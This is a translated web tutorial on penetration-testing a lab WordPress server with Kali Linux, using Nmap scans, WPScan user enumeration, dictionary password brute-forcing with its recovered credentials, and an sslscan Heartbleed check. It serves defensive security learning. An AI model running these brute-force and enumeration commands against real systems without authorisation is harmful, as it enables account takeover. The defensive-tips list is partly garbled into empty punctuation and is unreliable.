Clever Geek Handbook

Find and not neutralize: writing penetration tests with Kali Linux

Kali and other similar tools help detect vulnerabilities in your software. And it's better if you find them first, and not the intruders.







You can't hide an awl in a sack: out of ignorance (though in some cases - intentionally) even large corporations leave holes in their security system. It is vital to (1) localize and (2) fix them as quickly as possible. Fortunately, there are many different products that help with the first point. Among them is Kali , a Linux distribution designed for security testing. In this article, I will show you how to use Kali Linux to investigate your system and find weaknesses by simulating an attacker.



The Kali distribution includes many tools, all of which are open source. It is enough to run the installation of the distribution and all these tools will be available out of the box.







Image : Peter Gervase , CC BY-SA 4.0



I will use two systems as test subjects:



  1. kali.usersys.redhat.com : 30 GB of memory and 6 virtual CPUs. This system will scan the victim and launch attacks.



  2. vulnerable.usersys.redhat.com : A system with Red Hat Enterprise Linux 8 on board. Here it will need to be attacked.


It was not for nothing that I mentioned the technical characteristics of the equipment here. Some of our tasks are quite demanding on the hardware, especially the system 2 CPU, which will run the WordPress security scanner ( WPScan ).



Search for open ports



I started with a basic scan of system 2. By scanning the system with Nmap , you can find out which ports and services are visible from system 1 starting the scan.







Image : Peter Gervase , CC BY-SA 4.0



So the first thing to do is to find some "interesting" open ports - potential weaknesses. In fact, any open port is interesting because it is more likely to compromise the network. In this example, 21, 22, 80, and 443 are also ports for frequently used services. But for now, I'm just doing intelligence and trying to get as much information as possible about the system I want to hack.



After that, for a deeper analysis, I'll select port 80 and run the Nmap command with the -p 80 and -A arguments. This allows you to get information about the operating system and the application that is using port 80.







Image : Peter Gervase , CC BY-SA 4.0



Here we are interested in the following lines: 



PORT   STATE SERVICE VERSION

80/tcp open  http       Apache httpd 2.4.37 ((Red Hat Enterprise Linux))

|_http-generator: WordPress 5.6.1




Finding information about users



Since I now know this is a WordPress server, I can use WPScan to get information on potential vulnerabilities. It would be nice to find several usernames and their passwords. To find them in a given WordPress instance, use the --enumerate u options: Ok, found two users: admin and pgervase . I will try to guess the password for the admin user using password dictionaries - a text file with a set of possible options. I will take dictionaries of 3,231 and 3,543,076,137 lines.



┌──(rootkali)-[~]



└─# wpscan --url vulnerable.usersys.redhat.com --enumerate u



_______________________________________________________________



        __              _______   _____



        \ \     / /  __ \ / ____|



        \ \  /\  / /| |__) | (___   ___  __ _ _ __



        \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \



                \  /\  /  | |   ____) | (__| (_| | | | |



                \/  \/   |_|    |_____/ \___|\__,_|_| |_|



        WordPress Security Scanner by the WPScan Team



                        Version 3.8.10



        Sponsored by Automattic — https://automattic.com/



        @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart



_______________________________________________________________



[+] URL: http://vulnerable.usersys.redhat.com/ [10.19.47.242]



[+] Started: Tue Feb 16 21:38:49 2021



Interesting Finding(s):



...



[i] User(s) Identified:



[+] admin



 | Found By: Author Posts — Display Name (Passive Detection)



 | Confirmed By:



 |  Author Id Brute Forcing — Author Pattern (Aggressive Detection)



 |  Login Error Messages (Aggressive Detection)



[+] pgervase



 | Found By: Author Posts — Display Name (Passive Detection)



 | Confirmed By:



 |  Author Id Brute Forcing — Author Pattern (Aggressive Detection)



 |  Login Error Messages (Aggressive Detection)











Password guessing with dictionary attack



Various tools can be used for dictionary attacks. Here are two example commands with Nmap and WPScan: 



# nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=/path/to/passworddb,threads=6 vulnerable.usersys.redhat.com

# wpscan --url vulnerable.usersys.redhat.com --passwords /path/to/passworddb --usernames admin --max-threads 50 | tee nmap.txt


These two tools, of course, can do much more, but they are also suitable for guessing passwords. 



But this WPScan command, for example, displays the password at the end of the file: 



┌──(rootkali)-[~]

└─# wpscan --url vulnerable.usersys.redhat.com --passwords passwords.txt --usernames admin

_______________________________________________________________

        __              _______   _____

        \ \     / /  __ \ / ____|

        \ \  /\  / /| |__) | (___   ___  __ _ _ __ 

        \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \

                \  /\  /  | |   ____) | (__| (_| | | | |

                \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team

                        Version 3.8.10

        Sponsored by Automattic — https://automattic.com/

        @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

_______________________________________________________________

[+] URL: http://vulnerable.usersys.redhat.com/ [10.19.47.242]

[+] Started: Thu Feb 18 20:32:13 2021

Interesting Finding(s):

…..

[+] Performing password attack on Wp Login against 1 user/s

Trying admin / redhat Time: 00:01:57 

<==================================================================================================================>

 (3231 / 3231) 100.00% Time: 00:01:57

Trying admin / redhat Time: 00:01:57 

<=========================================================            

                                             > (3231 / 6462) 50.00% 

 ETA: ??:??:??

[SUCCESS] — admin / redhat                                              

                                                                        

                                                

[!] Valid Combinations Found:

 | Username: admin, Password: redhat


The Valid Combinations Found section at the end contains the username admin and his password. It took only two minutes to iterate over 3,231 lines.



I have another dictionary file with 3 238 659 984 unique entries, which will take much longer.



Nmap produces results much faster: 



┌──(rootkali)-[~]

└─# nmap -sV --script http-wordpress-brute 

--script-args userdb=users.txt,passdb=password.txt,threads=6 

vulnerable.usersys.redhat.com

Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-18 20:48 EST

Nmap scan report for vulnerable.usersys.redhat.com (10.19.47.242)

Host is up (0.00015s latency).

Not shown: 995 closed ports

PORT    STATE SERVICE VERSION

21/tcp   open  ftp      vsftpd 3.0.3

22/tcp   open  ssh      OpenSSH 8.0 (protocol 2.0)

80/tcp   open  http     Apache httpd 2.4.37 ((Red Hat Enterprise Linux))

|_http-server-header: Apache/2.4.37 (Red Hat Enterprise Linux)

| http-wordpress-brute:

|   Accounts:

|       admin:redhat — Valid credentials              <<<<<<<

|       pgervase:redhat — Valid credentials         <<<<<<<

|_  Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0

111/tcp  open  rpcbind 2-4 (RPC #100000)

| rpcinfo:

|   program version     port/proto  service

|   100000  2,3,4       111/tcp   rpcbind

|   100000  2,3,4       111/udp   rpcbind

|   100000  3,4         111/tcp6  rpcbind

|_  100000  3,4         111/udp6  rpcbind

3306/tcp open  mysql   MySQL 5.5.5-10.3.27-MariaDB

MAC Address: 52:54:00:8C:A1:C0 (QEMU virtual NIC)

Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds




True, such a scan can be tracked by the HTTPD logs that will be detected in the compromised system: 



10.19.47.170

 - — [18/Feb/2021:20:14:01 -0500] «POST /wp-login.php HTTP/1.1» 200 7575

 «http://vulnerable.usersys.redhat.com/» «WPScan v3.8.10 

(https://wpscan.org/)»

10.19.47.170 — - [18/Feb/2021:20:14:00 -0500] «POST /wp-login.php 

HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan 

v3.8.10 (https://wpscan.org/)»

10.19.47.170 — - [18/Feb/2021:20:14:00 -0500] «POST /wp-login.php 

HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan 

v3.8.10 (https://wpscan.org/)»

10.19.47.170 — - [18/Feb/2021:20:14:00 -0500] «POST /wp-login.php 

HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan 

v3.8.10 (https://wpscan.org/)»

10.19.47.170 — - [18/Feb/2021:20:14:00 -0500] «POST /wp-login.php 

HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan 

v3.8.10 (https://wpscan.org/)»

10.19.47.170 — - [18/Feb/2021:20:14:00 -0500] «POST /wp-login.php 

HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan 

v3.8.10 (https://wpscan.org/)»

10.19.47.170 — - [18/Feb/2021:20:14:02 -0500] «POST /wp-login.php 

HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan 

v3.8.10 (https://wpscan.org/)»

10.19.47.170 — - [18/Feb/2021:20:14:02 -0500] «POST /wp-login.php 

HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan 

v3.8.10 (https://wpscan.org/)»

10.19.47.170 — - [18/Feb/2021:20:14:02 -0500] «POST /wp-login.php 

HTTP/1.1» 200 7575 «http://vulnerable.usersys.redhat.com/» «WPScan 

v3.8.10 (https://wpscan.org/)»




Search for Heartbleed vulnerability



To get information about the HTTPS server and SSL / TLS protocols, I use the sslscan command: 



┌──(rootkali)-[~]

└─# sslscan vulnerable.usersys.redhat.com

Version: 2.0.6-static

OpenSSL 1.1.1i-dev  xx XXX xxxx

Connected to 10.19.47.242

Testing SSL server vulnerable.usersys.redhat.com on port 443 using SNI name vulnerable.usersys.redhat.com

  SSL/TLS Protocols:

SSLv2   disabled

SSLv3   disabled

TLSv1.0   disabled

TLSv1.1   disabled

TLSv1.2   enabled

TLSv1.3   enabled

<snip>




We see that no Heartbleed vulnerability was found in the protocol versions used on the server : 



Heartbleed:

TLSv1.3 not vulnerable to heartbleed

TLSv1.2 not vulnerable to heartbleed




Well, it means that through the Heartbeat module I cannot access the RAM and server data. Well ... it's not destiny :)



Hacking Prevention and Protection Tips



You can write many articles on how to resist attacks by hackers of all stripes. Here I will limit myself to general recommendations:



  • Examine your system : which ports are open, which ports should be open, who should be able to see those ports, and how much traffic should go through them. Nmap to help you.



  • : , , ​​. .



  • : , , WordPress, IP- . , IP- , . , .



  • : , .



  • : , . , .



  • , : , « - ».



  • Leverage additional tools from your software vendors: for example, Red Hat Enterprise Linux includes Red Hat Insights to tune your system and alert you to potential security threats in a timely manner.


Useful materials (in English)



What is described in this article is just the tip of the iceberg. To dive deeper, you can explore the following resources:









Cloud servers from Macleod are fast and secure.



Register using the link above or by clicking on the banner and get a 10% discount for the first month of renting a server of any configuration!





More articles:


All Articles